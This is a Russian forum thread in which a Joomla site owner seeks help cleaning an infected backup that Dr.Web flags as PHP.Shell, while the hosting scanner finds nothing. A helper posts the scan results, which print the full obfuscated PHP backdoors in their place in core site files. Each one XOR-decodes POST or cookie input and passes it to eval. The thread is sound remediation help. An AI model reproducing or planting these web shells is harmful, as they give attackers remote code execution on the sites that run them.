# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  Сайт на Joomla.  DrWeb находит в бэкапе сайта PHP.Shell.392, PHP.Shell.387, а Virusdie Рег.ру вирусов не находит

## kadomceva23

Доброго времени суток! В свое время создавал собственными силами сайт на Joomla для форума дома как начинающий кадомцева23.рф, да так с тех пор в этом направлении и не довелось развиться. С тех пор он уже несколько лет заражен вирусами и заблокирован владельцем хостинга. С радостью ушел-бы на форум дома на площадке ГИС ЖКХ, да все никак лицевые счета жильцов дома в ГИС ЖКХ не загрузят, а без этого на форум дома не попасть. 

Одно время оплатил Рег.ру антивирусную защиту на месяц и сайт работал, затем перестал оплачивать и он сразу же заблокировался. 
Теперь срок хостинга истекает и так как нет возможности платить ежегодную плату, то решил попробовать уйти на бесплатный хостинг beget.com Так как сайт небольшой и по размерам и количеству файлов соответствует условиям бесплатности.

Но так как сайт заражен вирусами, то я вновь оплатил на месяц рег.ру антивирусную защиту и провел лечение сайта с помощью антивирусной защиты рег.ру, чтобы можно было не зараженные данные забрать на бесплатный хостинг beget.com. 
Сайт стал открываться, после того как мне помогла тех.поддержка рег.ру



> При попытке войти на сайт http://xn--23-6kcajlh1but3g.xn--p1ai...p/forum/recent получаю сообщение "500 Internal Server Error Fatal Error was detected! Please contact the site owner."





> В файле сайта ~/www/xn--23-6kcajlh1but3g.xn--p1ai/libraries/cms/html/select.php присутствовала вредоносная вставка. Мы её закомментировали, сейчас доступ к сайту восстановлен


Но когда я скачиваю бэкап сайта на свой ПК, то  DrWeb блокирует файл бэкапа, так как находит в нем угрозы. Написал в поддержку рег.ру в надежде, что они добавят данные угрозы в антивирусную базу своего антивируса, но получил отказ



> Антивирусная проверка https://b2b.reg.ru/hosting/antivirus?service_id=6275411 не находит вирусов - "2020-06-27 19:24:20 Virusdie не нашел вирусов" Однако, скачиваю бэкап "Файлы сайта кадомцева23.рф от 27.06.2020. Проверяю файл 1593272866_site_u6275411_кадомцева23.рф_27.06.2020  .tar.gz сканером антивируса DrWeb с актуальными антивирусными базами, который выявляет ряд угроз. Скриншот лога результатов сканирования антивирусом DrWeb во вложении. Возможно ли включение выявленных антивирусом DrWeb угроз в антивирусные базы антивируса Virusdie, чтобы антивирус Virusdie мог выявить и устранить данные угрозы? Или у данной ситуации требуется иное решение?





> Здравствуйте!
> Антивирусы используют разные базы вредоносного ПО. Добавить список вредоносного ПО от Dr.Web для антивируса хостинга нельзя. К тому же ни один антивирус не может выявить абсолютно все вредоносное ПО.


В итоге мой "план минимум" - оплатив рег.ру месячную антивирусную защиту вычистить сайт и скачать не зараженный бэкап, чтобы когда-то позднее из него можно было восстановить сайт на бесплатный хостинг не сработал, так как судя по реакции DrWeb антивирус рег.ру не смог вычистить все угрозы.

Платный хостинг рег.ру истекает 30.06.2020, продлевать его еще на год нет возможности. Поэтому если кто за эти пару дней сможет помочь с программой минимум - очистке сайта, чтобы бэкап оказался без угроз, буду очень признателен! Файл бэкапа готов предоставить или удаленный доступ к панели управления хостингом. 

Заранее извиняюсь, что обратился в последние дни работы хостинга, короновирусная суета выбила из колеи, а терять наработку прежних лет не хотелось-бы.

Сайт кадомцева23.рф

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Aleksandra

Очень много букв. Что нужно от нас? Проверить Ваш сайт на вирусы?

Если да, то сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

----------

kadomceva23

----------


## kadomceva23

> Очень много букв. Что нужно от нас? Проверить Ваш сайт на вирусы?
> 
> Если да, то сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.


Все верно! Ссылку на актуальный бэкап отправил в ЛС. Огромное спасибо, что откликнулись!

----------


## Aleksandra

Нужна БД сайта. В архиве ее нет.

----------

kadomceva23

----------


## kadomceva23

> Нужна БД сайта. В архиве ее нет.


Нижайше прошу меня извинить, актуальная ссылка отправлена в ЛС.

- - - - -Добавлено - - - - -

Добавил вторую ссылку, вторым сообщением в ЛС

- - - - -Добавлено - - - - -

Добавил третью ссылку, третьим сообщением в ЛС

----------


## Aleksandra

Здравствуйте!

Извините за задержку с ответом, была занята на работе.

Все что детектит Dr.Web можете смело удалить.



```
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/plugins/content/joomla/joomla.php:<?php $m213be0 = 282;$GLOBALS['m93b0']=Array();global$m93b0;$m93b0=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['dc30cfecf']="\x26\x3d\x5b\x33\x61\x27\x34\x67\x7b\x57\x68\x9\x3f\x59\x4b\x58\x6e\x32\x50\x42\x46\x78\x38\x5c\x7a\x7c\x76\x2e\x35\x40\x6b\x56\x73\x79\x6f\x30\x23\x29\x53\x24\x65\xa\x5e\x71\x5a\x7d\x75\x25\x72\x43\x60\x6c\x3c\x2a\x4e\x37\x45\x4f\x70\x20\x2d\x54\x3e\x51\x74\x63\x6d\x4c\x7e\x44\x49\x28\x62\x48\x4a\x39\x3b\x22\x2c\xd\x3a\x47\x66\x2f\x2b\x69\x55\x64\x31\x5f\x41\x4d\x77\x36\x52\x5d\x21\x6a";$m93b0[$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][22]]=$m93b0['dc30cfecf'][58].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][30];$m93b0[$m93b0['dc30cfecf'][30].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][40]]=$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][46].$m93b0['dc30cfecf'][16].$m93b0['dc30cfecf'][64];$m93b0[$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][17]]=$m93b0['dc30cfecf'][32].$m93b0['dc30cfecf'][46].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][32].$m93b0['dc30cfecf'][64].$m93b0['dc30cfecf'][48];$m93b0[$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][3].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][17]]=$m93b0['dc30cfecf'][32].$m93b0['dc30cfecf'][64].$m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][51].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][16];$m93b0[$m93b0['dc30cfecf'][10].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][82]]=$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][21].$m93b0['dc30cfecf'][58].$m93b0['dc30cfecf'][51].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][40];$m93b0[$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][4]]=$m93b0['dc30cfecf'][32].$m93b0['dc30cfecf'][64].$m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][89].$m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][58].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][64];$m93b0[$m93b0['dc30cfecf'][10].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][28]]=$_POST;$m93b0[$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][88]]=$_COOKIE;$p3a3c29=Array($m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][16].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][66].$m93b0['dc30cfecf'][88]=>$m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][16].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][66].$m93b0['dc30cfecf'][17]);$cc98d8b=Array($m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][16].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][66].$m93b0['dc30cfecf'][3]=>$m93b0['dc30cfecf'][48].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][16].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][34].$m93b0['dc30cfecf'][66].$m93b0['dc30cfecf'][6]);foreach(Array($p3a3c29,$m93b0[$m93b0['dc30cfecf'][10].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][28]],$cc98d8b,$m93b0[$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][88]])as$ad9c789){foreach($ad9c789as$a1657eac=>$y83943309){[email protected]$m93b0[$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][22]]($m93b0['dc30cfecf'][73].$m93b0['dc30cfecf'][53],$y83943309);$a1657eac.=$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][3].$m93b0['dc30cfecf'][60].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][82].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][60].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][75].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][60].$m93b0['dc30cfecf'][22].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][75].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][60].$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][22].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][88].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][22].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][75];$u84ec0=$y83943309^$m93b0[$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][17].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][40].$m93b0['dc30cfecf'][17]]($m93b0[$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][4]]($a1657eac,($m93b0[$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][3].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][17]]($y83943309)/$m93b0[$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][3].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][17]]($a1657eac))+1),0,$m93b0[$m93b0['dc30cfecf'][87].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][65].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][3].$m93b0['dc30cfecf'][55].$m93b0['dc30cfecf'][17]]($y83943309));$u84ec0=$m93b0[$m93b0['dc30cfecf'][10].$m93b0['dc30cfecf'][6].$m93b0['dc30cfecf'][72].$m93b0['dc30cfecf'][35].$m93b0['dc30cfecf'][28].$m93b0['dc30cfecf'][82]]($m93b0['dc30cfecf'][36],$u84ec0);if($m93b0[$m93b0['dc30cfecf'][30].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][4].$m93b0['dc30cfecf'][93].$m93b0['dc30cfecf'][40]]($u84ec0)==3){eval/*sc92a7e*/($u84ec0[1]($u84ec0[2]));exit();}}} ?><?php
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/cms/html/select.php:#<?php $bafa2 = 281;$GLOBALS['p060f545f']=Array();global$p060f545f;$p060f545f=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['y6b7acb7']="\x5c\x3d\x4e\x78\x22\x3c\x5f\x41\x60\x20\x27\x3a\x75\x44\x73\x7c\x24\x38\x77\x46\x6c\x9\x3b\x51\x6f\x4c\x66\x5a\x56\x21\x70\x63\x61\x7a\x74\x72\x64\x33\x25\x43\x7e\x4a\x4b\xa\x5e\x49\x39\x28\x2a\x47\x42\x6a\x76\x35\x4f\x48\x7d\x23\x2c\x37\x26\x2f\xd\x54\x2d\x52\x69\x2e\x79\x31\x68\x67\x5b\x53\x2b\x6e\x29\x30\x40\x32\x65\x34\x6b\x6d\x3f\x36\x58\x45\x59\x50\x57\x55\x62\x71\x5d\x7b\x4d\x3e";$p060f545f[$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][92]]=$p060f545f['y6b7acb7'][30].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][82];$p060f545f[$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][77]]=$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][12].$p060f545f['y6b7acb7'][75].$p060f545f['y6b7acb7'][34];$p060f545f[$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][46]]=$p060f545f['y6b7acb7'][14].$p060f545f['y6b7acb7'][12].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][14].$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][35];$p060f545f[$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][77]]=$p060f545f['y6b7acb7'][14].$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][20].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][75];$p060f545f[$p060f545f['y6b7acb7'][12].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][85]]=$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][3].$p060f545f['y6b7acb7'][30].$p060f545f['y6b7acb7'][20].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][80];$p060f545f[$p060f545f['y6b7acb7'][93].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][77].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][26]]=$p060f545f['y6b7acb7'][14].$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][6].$p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][30].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][34];$p060f545f[$p060f545f['y6b7acb7'][68].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][80]]=$_POST;$p060f545f[$p060f545f['y6b7acb7'][70].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][85].$p060f545f['y6b7acb7'][36]]=$_COOKIE;$c37541e03=Array($p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][75].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][83].$p060f545f['y6b7acb7'][69]=>$p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][75].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][83].$p060f545f['y6b7acb7'][79]);$fa462f7d8=Array($p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][75].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][83].$p060f545f['y6b7acb7'][37]=>$p060f545f['y6b7acb7'][35].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][75].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][83].$p060f545f['y6b7acb7'][81]);foreach(Array($c37541e03,$p060f545f[$p060f545f['y6b7acb7'][68].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][80]],$fa462f7d8,$p060f545f[$p060f545f['y6b7acb7'][70].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][85].$p060f545f['y6b7acb7'][36]])as$k63f1){foreach($k63f1as$rad2d=>$sf5e){[email protected]$p060f545f[$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][92]]($p060f545f['y6b7acb7'][55].$p060f545f['y6b7acb7'][48],$sf5e);$rad2d.=$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][69].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][64].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][77].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][64].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][85].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][64].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][69].$p060f545f['y6b7acb7'][85].$p060f545f['y6b7acb7'][64].$p060f545f['y6b7acb7'][85].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][69].$p060f545f['y6b7acb7'][85];$z3e9cc=$sf5e^$p060f545f[$p060f545f['y6b7acb7'][24].$p060f545f['y6b7acb7'][37].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][46]]($p060f545f[$p060f545f['y6b7acb7'][93].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][77].$p060f545f['y6b7acb7'][26].$p060f545f['y6b7acb7'][26]]($rad2d,($p060f545f[$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][77]]($sf5e)/$p060f545f[$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][77]]($rad2d))+1),0,$p060f545f[$p060f545f['y6b7acb7'][34].$p060f545f['y6b7acb7'][79].$p060f545f['y6b7acb7'][92].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][77]]($sf5e));$z3e9cc=$p060f545f[$p060f545f['y6b7acb7'][12].$p060f545f['y6b7acb7'][81].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][31].$p060f545f['y6b7acb7'][59].$p060f545f['y6b7acb7'][46].$p060f545f['y6b7acb7'][85]]($p060f545f['y6b7acb7'][57],$z3e9cc);if($p060f545f[$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][32].$p060f545f['y6b7acb7'][80].$p060f545f['y6b7acb7'][36].$p060f545f['y6b7acb7'][77]]($z3e9cc)==3){eval/*jf218c14b*/($z3e9cc[1]($z3e9cc[2]));exit();}}} ?>
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/phputf8/ucwords.php:    // Note: [\x0c\x09\x0b\x0a\x0d\x20] matches;
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/phputf8/ucwords.php:    $pattern = '/(^|([\x0c\x09\x0b\x0a\x0d\x20]+))([^\x0c\x09\x0b\x0a\x0d\x20]{1})[^\x0c\x09\x0b\x0a\x0d\x20]*/u';
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/joomla/environment/response.php:		$gzdata		= "\x1f\x8b\x08\x00\x00\x00\x00\x00";
/home/aleksa/public_html/xn--23-6kcajlh1but3g.xn--p1ai/libraries/joomla/base/adapterinstance.php:<?php $he20a89 = 421;$GLOBALS['w261a53']=Array();global$w261a53;$w261a53=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['je525d85']="\x23\x61\x4d\x6c\x3f\x68\x6a\x4b\x36\x3e\x74\x5c\x52\x21\x4a\x62\x46\x41\x6d\x60\x3d\x33\x5a\x3a\x75\x25\x31\x40\x7e\xd\x2a\x27\x44\x32\x5b\x2c\x7b\x49\x2d\x5e\x39\x2e\x51\x6e\x58\x47\x28\x59\xa\x34\x30\x50\x43\x77\x65\x42\x73\x69\x76\x67\x3b\x2f\x55\x4c\x4f\x5d\x9\x22\x63\x79\x5f\x70\x2b\x7a\x37\x35\x24\x72\x3c\x66\x26\x45\x6b\x56\x71\x4e\x20\x7d\x48\x57\x7c\x78\x54\x53\x6f\x38\x29\x64";$w261a53[$w261a53['je525d85'][15].$w261a53['je525d85'][8].$w261a53['je525d85'][54].$w261a53['je525d85'][54].$w261a53['je525d85'][74].$w261a53['je525d85'][1].$w261a53['je525d85'][1].$w261a53['je525d85'][75]]=$w261a53['je525d85'][71].$w261a53['je525d85'][1].$w261a53['je525d85'][68].$w261a53['je525d85'][82];$w261a53[$w261a53['je525d85'][68].$w261a53['je525d85'][8].$w261a53['je525d85'][75].$w261a53['je525d85'][95].$w261a53['je525d85'][75].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]=$w261a53['je525d85'][68].$w261a53['je525d85'][94].$w261a53['je525d85'][24].$w261a53['je525d85'][43].$w261a53['je525d85'][10];$w261a53[$w261a53['je525d85'][5].$w261a53['je525d85'][40].$w261a53['je525d85'][1].$w261a53['je525d85'][54].$w261a53['je525d85'][74]]=$w261a53['je525d85'][56].$w261a53['je525d85'][24].$w261a53['je525d85'][15].$w261a53['je525d85'][56].$w261a53['je525d85'][10].$w261a53['je525d85'][77];$w261a53[$w261a53['je525d85'][53].$w261a53['je525d85'][33].$w261a53['je525d85'][75].$w261a53['je525d85'][40].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]=$w261a53['je525d85'][56].$w261a53['je525d85'][10].$w261a53['je525d85'][77].$w261a53['je525d85'][3].$w261a53['je525d85'][54].$w261a53['je525d85'][43];$w261a53[$w261a53['je525d85'][91].$w261a53['je525d85'][21].$w261a53['je525d85'][33].$w261a53['je525d85'][54].$w261a53['je525d85'][49]]=$w261a53['je525d85'][54].$w261a53['je525d85'][91].$w261a53['je525d85'][71].$w261a53['je525d85'][3].$w261a53['je525d85'][94].$w261a53['je525d85'][97].$w261a53['je525d85'][54];$w261a53[$w261a53['je525d85'][43].$w261a53['je525d85'][1].$w261a53['je525d85'][49].$w261a53['je525d85'][1].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]=$w261a53['je525d85'][56].$w261a53['je525d85'][10].$w261a53['je525d85'][77].$w261a53['je525d85'][70].$w261a53['je525d85'][77].$w261a53['je525d85'][54].$w261a53['je525d85'][71].$w261a53['je525d85'][54].$w261a53['je525d85'][1].$w261a53['je525d85'][10];$w261a53[$w261a53['je525d85'][68].$w261a53['je525d85'][54].$w261a53['je525d85'][74].$w261a53['je525d85'][33].$w261a53['je525d85'][40].$w261a53['je525d85'][21]]=$_POST;$w261a53[$w261a53['je525d85'][54].$w261a53['je525d85'][26].$w261a53['je525d85'][95].$w261a53['je525d85'][68]]=$_COOKIE;$c4f8e=Array($w261a53['je525d85'][77].$w261a53['je525d85'][1].$w261a53['je525d85'][43].$w261a53['je525d85'][97].$w261a53['je525d85'][94].$w261a53['je525d85'][18].$w261a53['je525d85'][26]=>$w261a53['je525d85'][77].$w261a53['je525d85'][1].$w261a53['je525d85'][43].$w261a53['je525d85'][97].$w261a53['je525d85'][94].$w261a53['je525d85'][18].$w261a53['je525d85'][33]);$id1ed=Array($w261a53['je525d85'][77].$w261a53['je525d85'][1].$w261a53['je525d85'][43].$w261a53['je525d85'][97].$w261a53['je525d85'][94].$w261a53['je525d85'][18].$w261a53['je525d85'][21]=>$w261a53['je525d85'][77].$w261a53['je525d85'][1].$w261a53['je525d85'][43].$w261a53['je525d85'][97].$w261a53['je525d85'][94].$w261a53['je525d85'][18].$w261a53['je525d85'][49]);foreach(Array($c4f8e,$w261a53[$w261a53['je525d85'][68].$w261a53['je525d85'][54].$w261a53['je525d85'][74].$w261a53['je525d85'][33].$w261a53['je525d85'][40].$w261a53['je525d85'][21]],$id1ed,$w261a53[$w261a53['je525d85'][54].$w261a53['je525d85'][26].$w261a53['je525d85'][95].$w261a53['je525d85'][68]])as$h980887a){foreach($h980887aas$v901f=>$j216){[email protected]$w261a53[$w261a53['je525d85'][15].$w261a53['je525d85'][8].$w261a53['je525d85'][54].$w261a53['je525d85'][54].$w261a53['je525d85'][74].$w261a53['je525d85'][1].$w261a53['je525d85'][1].$w261a53['je525d85'][75]]($w261a53['je525d85'][88].$w261a53['je525d85'][30],$j216);$v901f.=$w261a53['je525d85'][95].$w261a53['je525d85'][74].$w261a53['je525d85'][26].$w261a53['je525d85'][68].$w261a53['je525d85'][15].$w261a53['je525d85'][8].$w261a53['je525d85'][49].$w261a53['je525d85'][49].$w261a53['je525d85'][38].$w261a53['je525d85'][26].$w261a53['je525d85'][1].$w261a53['je525d85'][74].$w261a53['je525d85'][8].$w261a53['je525d85'][38].$w261a53['je525d85'][49].$w261a53['je525d85'][68].$w261a53['je525d85'][74].$w261a53['je525d85'][15].$w261a53['je525d85'][38].$w261a53['je525d85'][15].$w261a53['je525d85'][54].$w261a53['je525d85'][74].$w261a53['je525d85'][97].$w261a53['je525d85'][38].$w261a53['je525d85'][21].$w261a53['je525d85'][50].$w261a53['je525d85'][54].$w261a53['je525d85'][75].$w261a53['je525d85'][8].$w261a53['je525d85'][50].$w261a53['je525d85'][68].$w261a53['je525d85'][74].$w261a53['je525d85'][21].$w261a53['je525d85'][26].$w261a53['je525d85'][50].$w261a53['je525d85'][15];$ade1724a=$j216^$w261a53[$w261a53['je525d85'][5].$w261a53['je525d85'][40].$w261a53['je525d85'][1].$w261a53['je525d85'][54].$w261a53['je525d85'][74]]($w261a53[$w261a53['je525d85'][43].$w261a53['je525d85'][1].$w261a53['je525d85'][49].$w261a53['je525d85'][1].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]($v901f,($w261a53[$w261a53['je525d85'][53].$w261a53['je525d85'][33].$w261a53['je525d85'][75].$w261a53['je525d85'][40].$w261a53['je525d85'][74].$w261a53['je525d85'][68]]($j216)/$w261a53[$w261a53['je525d85'][53].$w261a53['je525d85'][33].$w261a53['je525d85'][75].$w261a53['je525d85'][40].$w261a53['je525d85'][74].$w261a53['je525d85'